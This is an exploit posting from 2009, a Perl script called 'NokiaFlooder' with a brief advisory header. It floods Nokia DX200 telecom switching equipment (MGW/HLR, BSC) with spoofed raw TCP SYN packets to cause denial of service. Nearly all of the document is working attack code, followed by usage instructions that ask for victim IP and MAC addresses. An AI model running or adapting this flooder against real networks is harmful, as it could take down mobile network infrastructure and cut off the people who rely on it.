NokiaFlooder.txt
Posted on 23 January 2009
####################################################################### #Vulnerability: Nokia TCP Syn Flood DoS - DX200 #Synopsis : Denial of Service #Affected Platforms: DX200 M13 (MGW/HLR), S12 (BSC) #Severity: High Risk #Vendor: Nokia (http://www.nokia.com/) #Exploit Release Date: 01/21/2009 #By: tambarus (tambarus@gmail.com) ####################################################################### #!/usr/bin/perl eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed " if $@; eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed " if $@; eval ("use Term::ProgressBar;"); die "[error] Term::ProgressBar perl module is not installed " if $@; my $VERSION = "1.0"; print "$0, $PgmName, V $VERSION "; GetOptions ( "help" =>$usage, "device=s" => $device, "source=s" =>$sourceip, "dest=s"=>$destip, "sourcemac=s"=>$sourcemac, "destmac=s"=>$destmac, "port=n"=> $tcpport, ); my $timeout = "0,1"; # Timeout if ($usage) {&usage;} if (!$device) { $device= 'eth0'; # Enter Nokia DX200 IP } if (!$destmac) {print "Dest MAC not found "; &usage;} if (!$sourceip) {print "Source IP not found "; &usage;} if (!$destip) {print "Dest IP not found "; &usage;} if (!$tcpport) {print "TCP port not found "; &usage;} my $syn="1"; # TCP SYN SET my $tcpdata = "BLASTNOKIA"; # TCP payload my $count=0; #Initialize Progres Bar my $progress = Term::ProgressBar->new(32768); $progress->minor(0); $packet = new Net::RawIP; $packet-> ethnew($device); if (!$sourcemac) { $packet -> ethset( dest => $destmac); }else { $packet -> ethset( source =>$sourcemac, dest => $destmac); } for ($count=0; $count< 65537 ; $count++) { $packet->set({ ip => { saddr => $sourceip, daddr => $destip }, tcp => { check => 0x0010 , # TCP Packet Checksum 0 for auto correct source => $count, dest => $tcpport, syn => $syn, data => $tcpdata }}); $packet->ethsend($timeout); #$packet->send($timeout); $progress->update($_); $count++; } sub usage { print <<EOF ; This vulnerability is already disclosed and can be exploited by TCP Syn Flooding. usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n] Options: --help This message --device Network interface (defaut set eth0) --source Victim source IP --dest Victim destination IP --sourcemac Victim source MAC --destmac MAC Address of the gateway --port TCP port Example: ./NokiaFlooder.pl --device eth0 --source 10.1.1.88 --dest 10.1.1.99 --sourcemac 00:11:22:22:11:00 --destmac 00:11:22:22:11:99 --port 23 EOF exit shift; }
